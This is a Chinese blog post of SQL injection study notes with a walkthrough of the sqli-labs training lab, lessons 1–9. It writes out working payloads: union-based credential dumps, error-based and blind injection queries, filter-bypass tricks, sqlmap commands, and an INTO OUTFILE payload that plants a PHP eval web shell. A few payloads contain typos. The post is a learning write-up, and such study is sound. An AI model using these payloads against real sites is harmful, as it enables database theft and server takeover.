<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入学习," />










<meta name="description" content="SQL注入漏洞学习笔记+靶场总结mysql相关知识点Mysql 5.x数据结构​      在Mysql5.0以上的版本中，为了方便管理，默认定义了information_schema数据库，用来存储数据库元信息。其中具有表schemata(数据库名)、tables（表名）、columns(列名或字段名)。 ​     在schemata表中，schema_name字段用来存储数据库名。 ​">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入知识点总结+靶场笔记">
<meta property="og:url" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="SQL注入漏洞学习笔记+靶场总结mysql相关知识点Mysql 5.x数据结构​      在Mysql5.0以上的版本中，为了方便管理，默认定义了information_schema数据库，用来存储数据库元信息。其中具有表schemata(数据库名)、tables（表名）、columns(列名或字段名)。 ​     在schemata表中，schema_name字段用来存储数据库名。 ​">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206143207.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206143914.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205184721.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205184704.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205184647.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205184623.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205190036.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205190557.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205190649.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205192706.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206132510.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206132607.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206132652.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206133237.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206133320.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206122518.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206120820.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206121046.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206123636.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206123628.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205195014.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205195102.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205194242.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200205194753.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206125708.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/%5CQQ%E6%88%AA%E5%9B%BE20200206125727.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206130037.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206130124.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206130709.png">
<meta property="og:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206130537.png">
<meta property="article:published_time" content="2020-03-12T10:46:30.000Z">
<meta property="article:modified_time" content="2020-04-27T11:56:13.279Z">
<meta property="article:author" content="Shu1L">
<meta property="article:tag" content="SQL注入学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/QQ%E6%88%AA%E5%9B%BE20200206143207.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/"/>





  <title>SQL注入知识点总结+靶场笔记 | Hexo</title>
  








<meta name="generator" content="Hexo 4.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://shu1l.github.io/2020/03/12/sql-zhu-ru-zhi-shi-dian-zong-jie-ba-chang-bi-ji/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shu1L">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入知识点总结+靶场笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-12T18:46:30+08:00">
                2020-03-12
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index">
                    <span itemprop="name">web漏洞学习</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="SQL注入漏洞学习笔记-靶场总结"><a href="#SQL注入漏洞学习笔记-靶场总结" class="headerlink" title="SQL注入漏洞学习笔记+靶场总结"></a>SQL注入漏洞学习笔记+靶场总结</h2><h4 id="mysql相关知识点"><a href="#mysql相关知识点" class="headerlink" title="mysql相关知识点"></a>mysql相关知识点</h4><h5 id="Mysql-5-x数据结构"><a href="#Mysql-5-x数据结构" class="headerlink" title="Mysql 5.x数据结构"></a><strong>Mysql 5.x数据结构</strong></h5><p>​      在Mysql5.0以上的版本中，为了方便管理，默认定义了information_schema数据库，用来存储数据库元信息。其中具有表schemata(数据库名)、tables（表名）、columns(列名或字段名)。</p>
<p>​     在schemata表中，schema_name字段用来存储数据库名。</p>
<p>​     在tables表中，table_schema和table_name分别用来存储数据库名和表名。</p>
<p>​    在columns表中，table_schema(数据库名)、table_name(表名)、column_name(字段名)</p>
<p>利用Navicat for MySQL查看结构。</p>
<h5 id="增删改查"><a href="#增删改查" class="headerlink" title="增删改查"></a><strong>增删改查</strong></h5><p><strong>SELECT</strong></p>
<p>SELECT 列名称 FROM 表名称 WHERE 字段1=‘条件</p>
<p>一’ AND 字段2=‘条件2’</p>
<p><strong>INSERT</strong></p>
<p>INSERT INTO table_name(列1…列2) VALUES(值1….值2….)</p>
<p><strong>UPDATE</strong></p>
<p>UPDATE 表名称 SET 列名称=新值 WHERE 列名称=某值</p>
<p><strong>DELETE</strong></p>
<p>DELETE FROM 表名称 WHERE 列名称=值</p>
<h5 id="Mysql常用的几种函数："><a href="#Mysql常用的几种函数：" class="headerlink" title="Mysql常用的几种函数："></a><strong>Mysql常用的几种函数：</strong></h5><p>user():查看当前Mysql登录用户名；</p>
<p>database():查看当前使用Mysql数据库名；</p>
<p>version():查看当前Mysql版本。</p>
<p>扩展limit关键字 limit m,n 从m行开始，到m+n行。</p>
<h5 id="注释"><a href="#注释" class="headerlink" title="注释"></a><strong>注释</strong></h5><ul>
<li>注释符：在Mysql中常见的注释符表达式：#、–空格、/**/</li>
<li>/<em>！SQL语句、\</em>/只有Mysql可以识别，常用来绕过WAF。</li>
</ul>
<p>例如：<code>select * from articles where id -id ;</code></p>
<p>使用内联注释注入：<code>select * from articles where id=-1 /*!union\*/ /\*!select\*/ 1,2,3,4</code></p>
<h5 id="注入点查找"><a href="#注入点查找" class="headerlink" title="注入点查找"></a>注入点查找</h5><ul>
<li>and 1=1/and 1=2（整型）</li>
<li>随机输入(整型)</li>
<li>-1/+1回显上下页</li>
<li>单引号（字符型/整型）</li>
<li>and sleep(5)(判断页面返回时间)</li>
</ul>
<h4 id="注入分类"><a href="#注入分类" class="headerlink" title="注入分类"></a>注入分类</h4><p><strong>根据语法：</strong></p>
<p><strong>1.可联合查询注入：</strong></p>
<p>注入前提：能使用union , 页面必须有显示位</p>
<p>注入方法：</p>
<ul>
<li>找到注入点并判断闭合字符</li>
<li>判断数据库类型</li>
<li>猜解列数，爆显示位</li>
<li>得到基本信息（如数据库名、数据库版本等）</li>
<li>猜解表名</li>
<li>得到列名</li>
<li>得到列值</li>
</ul>
<p><strong>2.报错型注入</strong></p>
<p>注入前提：页面没有显示位，源码使用了echo mysql_error输出了错误信息</p>
<p>​                    注入速度快，语句复杂、不能使用group_concat(),只能使用limit依次猜解</p>
<p>注入方法：</p>
<ul>
<li>floor报错注入</li>
</ul>
<p>​      <code>select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;</code></p>
<ul>
<li><p>updatexml报错注入</p>
</li>
<li><p>extractvalue报错注入</p>
</li>
</ul>
<p><strong>3.布尔型注入</strong></p>
<p>注入前提：页面存在注入但是没有显示位且源码没有使用echo mysql_error()输出报错信息。</p>
<p>注入方法:</p>
<ul>
<li>?id=1 and (注入语句) # 根据返回结果是否相同来得到数据</li>
<li>主要利用了length()、ascii()、substr()得到结果</li>
</ul>
<p><strong>4.基于时间延迟注入</strong></p>
<p>根据页面返回时间的不同来得到数据</p>
<h5 id="异或注入"><a href="#异或注入" class="headerlink" title="异或注入"></a>异或注入</h5><p>题目地址：<a href="http://123.206.87.240:9004/1ndex.php?id=1" target="_blank" rel="noopener">http://123.206.87.240:9004/1ndex.php?id=1</a></p>
<p>做题步骤：检测注入=&gt;了解过滤=&gt;获取数据</p>
<h5 id="orderby-注入"><a href="#orderby-注入" class="headerlink" title="orderby 注入"></a>orderby 注入</h5><p><code>select username,password FROM  users order by 1 asc;</code></p>
<p>1.直接加报错注入</p>
<p>2.Rand()方式</p>
<p>3.And payload时间盲注方式</p>
<p>4.其他方式</p>
<p><strong>5.多语句查询(堆叠查询）</strong></p>
<p>注入前提：只在MSSQL数据库存在</p>
<p>注入方法：一个SQL语句后跟分号后再跟一个语句即可执行两个语句。</p>
<p><strong>根据类型：</strong></p>
<ul>
<li>整型</li>
<li>字符串型</li>
<li>搜索型</li>
</ul>
<h5 id="注入位置"><a href="#注入位置" class="headerlink" title="注入位置"></a>注入位置</h5><ul>
<li>GET</li>
<li>POST</li>
<li>X-Forward-For</li>
<li>Cookie</li>
<li>User-Agent</li>
</ul>
<h4 id="SQL注入绕过机制"><a href="#SQL注入绕过机制" class="headerlink" title="SQL注入绕过机制"></a>SQL注入绕过机制</h4><h5 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h5><p>​         如果程序中设置了过滤关键字，但是过滤过程中并没有对关键字组成进行深入分析过滤，导致只是对整体进行过滤。例如：and过滤。当然这种过滤只是发现关键字出现。并不会对关键字进行处理。<br>​    通过修改关键字内字母大小写来绕过过滤措施。例如： AnD 1=1</p>
<p>​     例如，在进行探测当前表的字段数时，使用order by数字进行探测。如果过滤了order,可以使用OrdER来进行绕过。</p>
<h5 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h5><p>如果在程序中设置出现关键字之后替换为空，那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。</p>
<p>例如：过滤了union，我们可以使用ununionion进行绕过。</p>
<h5 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h5><p>可以利用网络中的URL在线编码，绕过SQL注入的过滤机制。</p>
<img src="QQ截图20200206143207.png" style="zoom:80%;" />

<hr>
<h5 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h5><p>在Mysql中内联注释中的内容可以被当做SQL语句执行。</p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206143914.png" alt=""></p>
<h4 id="sqlmap基础使用方法"><a href="#sqlmap基础使用方法" class="headerlink" title="sqlmap基础使用方法"></a>sqlmap<strong>基础使用方法</strong></h4><h5 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a><strong>sqlmap简介</strong></h5><p>​       sqlmap是一个开源的渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令</p>
<p>​         sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。</p>
<p>sqlmap支持五种不同的注入模式：</p>
<ul>
<li>基于布尔的盲注：既可以根据返回页面判断条件真假的注入。</li>
</ul>
<p>​        向数据库发送true或false这样的问题，并根据应用程序赶回的信息判断结果、这种攻击的出现是因为应用程序配置为只显示常规错误，但并没有解决SQL注入存在的代码问题。</p>
<ul>
<li>基于时间的盲注:即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断；</li>
<li>基于报错注入：即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中；</li>
<li>联合查询注入：可以使用union的情况下的注入</li>
<li>堆查询注入：可以同时执行多条语句的执行时注入</li>
</ul>
<p><strong>sqlmap常用参数</strong></p>
<ul>
<li><p>-h -help显示基本帮助信息</p>
</li>
<li><p>-hh 显示高级帮助信息并退出</p>
</li>
<li><p>-u指定url</p>
</li>
<li><p>-p指定参数</p>
</li>
<li><p>-D指定数据库</p>
</li>
<li><p>-T指定表</p>
</li>
<li><p>-C指定字段</p>
</li>
<li><p>–current-db当前数据库</p>
</li>
<li><p>–current-user当前用户</p>
</li>
<li><p>–dbs查询所有数据库</p>
</li>
<li><p>–tables查询所有表</p>
</li>
<li><p>–columns查询所有字段名</p>
</li>
<li><p>–dump查询记录</p>
</li>
<li><p>–techniques X(X=B布尔型，E报错型，U联合注入型，T延时型）</p>
</li>
</ul>
<h4 id="sqli-labs靶场实战"><a href="#sqli-labs靶场实战" class="headerlink" title="sqli-labs靶场实战"></a>sqli-labs靶场实战</h4><h5 id="less-1-基于错误的GET单引号字符型注入）"><a href="#less-1-基于错误的GET单引号字符型注入）" class="headerlink" title="less-1 (基于错误的GET单引号字符型注入）"></a>less-1 (基于错误的GET单引号字符型注入）</h5><p><strong>注入过程：</strong></p>
<p><code>?id=1&#39; or 1=1 %23</code></p>
<p><code>?id=1&#39; order by 3 %23</code>  #字段数为3</p>
<p><code>?id=1&#39; union select 1,2,3</code> #显示位为2，3</p>
<p><strong>爆库名</strong></p>
<p><code>?id=1&#39; union select 1,2,(select group_concat(schema_name) from information_schema.schemata) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205184721.png" alt=""></p>
<p><strong>爆表名</strong></p>
<p><code>?id=1&#39; union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;)%23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205184704.png" alt=""></p>
<p><strong>爆列名</strong></p>
<p><code>?id=1&#39; union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=&#39;user&#39;) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205184647.png" alt=""></p>
<p><strong>爆用户名和密码</strong></p>
<p><code>?id=1&#39; union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205184623.png" alt=""></p>
<p><strong>使用sqlmap自动化探测</strong></p>
<p><code>python sqlmap.py -u &quot;http://localhost/sqli-labs-master/Less-1/?id=1&quot; --dbs --batch</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205190036.png" alt=""></p>
<p><code>python sqlmap.py -u &quot;http://localhost/sqli-labs-master/Less-1/?id=1&quot; -D security --tables --batch</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205190557.png" alt=""></p>
<p><code>python sqlmap.py -u &quot;http://localhost/sqli-labs-master/Less-1/?id=1&quot; -D security -T users --batch</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205190649.png" alt=""></p>
<p><code>python sqlmap.py -u &quot;http://localhost/sqli-labs-master/Less-1/?id=1&quot; -D security -T users -C password,username --dump --batch</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205192706.png" alt=""></p>
<h5 id="Less-2-（基于错误的GET整型注入）"><a href="#Less-2-（基于错误的GET整型注入）" class="headerlink" title="Less-2 （基于错误的GET整型注入）"></a>Less-2 （基于错误的GET整型注入）</h5><p>数字型注入，去掉单引号即可。</p>
<p>构造同Less-1</p>
<h5 id="Less-3-（基于错误的GET单引号变形字符型注入）"><a href="#Less-3-（基于错误的GET单引号变形字符型注入）" class="headerlink" title="Less-3 （基于错误的GET单引号变形字符型注入）"></a>Less-3 （基于错误的GET单引号变形字符型注入）</h5><p>?id=1’) %23 回显正常</p>
<p>构造同Less-1</p>
<h5 id="Less-4（基于错误的GET双引号字符型注入）"><a href="#Less-4（基于错误的GET双引号字符型注入）" class="headerlink" title="Less-4（基于错误的GET双引号字符型注入）"></a>Less-4（基于错误的GET双引号字符型注入）</h5><p>?id=1”)%23 回显正常</p>
<p>构造同Less-01</p>
<h5 id="Less-5（双注入GET单引号字符型注入）"><a href="#Less-5（双注入GET单引号字符型注入）" class="headerlink" title="Less-5（双注入GET单引号字符型注入）"></a>Less-5（双注入GET单引号字符型注入）</h5><p><strong>爆库名</strong></p>
<p><code>?id=1&#39; union select count(*),1, concat(&#39;~&#39;,(select database()),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206132510.png" alt=""></p>
<p><strong>爆表名</strong></p>
<p><code>?id=1&#39; union select count(*),1, concat(&#39;~&#39;,(select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206132607.png" alt=""></p>
<p><strong>更换Limit后的数字即可查出其他表名</strong></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206132652.png" alt=""></p>
<p><strong>爆user表列名</strong></p>
<p><code>?id=1&#39;  union select count(*),1, concat(&#39;~&#39;,(select column_namefrom information_schema.tables where table_schema=&#39;security&#39;   and table_name=&#39;users&#39; limit 0,1),&#39;~&#39;,floor(rand()2)) as a from information_schema gruop by a %23</code></p>
<p><strong>爆username password内容</strong></p>
<p><code>?id=1&#39;union select count(*),1, concat(&#39;~&#39;,(select username from users limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206133237.png" alt=""></p>
<p><code>?id=1&#39;union select count(*),1, concat(&#39;~&#39;,(select password from users limit 0,1),&#39;~&#39;, floor(rand()*2)) as a from information_schema.tables group by a  %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206133320.png" alt=""></p>
<h5 id="Less-6-双注入GET双引号字符型注入）"><a href="#Less-6-双注入GET双引号字符型注入）" class="headerlink" title="Less-6 (双注入GET双引号字符型注入）"></a>Less-6 (双注入GET双引号字符型注入）</h5><p>将单引号换成双引号即可</p>
<p>构造同上</p>
<h5 id="Less-7-导出文件GET字符型注入）"><a href="#Less-7-导出文件GET字符型注入）" class="headerlink" title="Less-7(导出文件GET字符型注入）"></a>Less-7(导出文件GET字符型注入）</h5><p>我们首先需要打开phpstudy\PHPTutorial\MySQL\my.ini文件，在其中加上一句：secure_file_priv=“/”。</p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206122518.png" alt=""></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206120820.png" alt=""></p>
<p>我们需要用到两个函数：</p>
<p><strong>load_file()：</strong>读取本地文件</p>
<p><strong>into outfile()</strong> 写文件 （路径需要使用双斜线）</p>
<p>我们首先判断注入点：</p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206121046.png" alt=""></p>
<p>然后我们使用outfile函数将一句话木马写入文件。</p>
<pre class=" language-mysql"><code class="language-mysql">?id=-1')) union select 1,2,'<?php @eval($_POST["crow"]);?>' into outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\test.php"</code></pre>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206123636.png" alt=""></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206123628.png" alt=""></p>
<p>之后我们使用中国菜刀连接即可。 </p>
<h5 id="Less-8-基于布尔的盲注）"><a href="#Less-8-基于布尔的盲注）" class="headerlink" title="Less-8 (基于布尔的盲注）"></a>Less-8 (基于布尔的盲注）</h5><p><strong>爆数据库长度</strong></p>
<p><code>?id=1&#39; and (length(database())) = 8 %23 #数据库长度为8</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205195014.png" alt=""></p>
<p>我们任意修改长度，页面不回显</p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205195102.png" alt=""></p>
<p><strong>爆库名</strong></p>
<p><code>?id=1&#39; and (ascii(substr((select database()) ,1,1))) = 115 %23 # s</code></p>
<p><code>?id=1&#39;and(ascii(substr((select database()),2,1)))=101 %23 #e</code></p>
<p><code>?id=1&#39;and(ascii(substr((select database()),3,1)))=99 %23 #c</code></p>
<p><code>?id=1&#39; and (ascii(substr((select database()) ,4,1))) = 117 --+ #u</code></p>
<p><code>?id=1&#39; and (ascii(substr((select database()) ,5,1))) = 114 --+ #r</code></p>
<p>   <code>and (ascii(substr((select database()) ,6,1))) = 105 --+    #i</code></p>
<p><code>and (ascii(substr((select database()) ,7,1))) = 116 --+   #t</code></p>
<p><code>?id=1&#39; and (ascii(substr((select database()) ,8,1))) = 121 --+  #y</code></p>
<p><strong>爆表名长度</strong></p>
<p><code>?id=1&#39; and (length((select table_name from information_schema.tables  where table_schema=database() limit 0,1)))=6 %23</code></p>
<p>类推以上即可：</p>
<h5 id="Less-9（基于时间的GET单引号盲注）"><a href="#Less-9（基于时间的GET单引号盲注）" class="headerlink" title="Less-9（基于时间的GET单引号盲注）"></a>Less-9（基于时间的GET单引号盲注）</h5><p><code>?id=1&#39; and sleep(5) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205194242.png" alt=""></p>
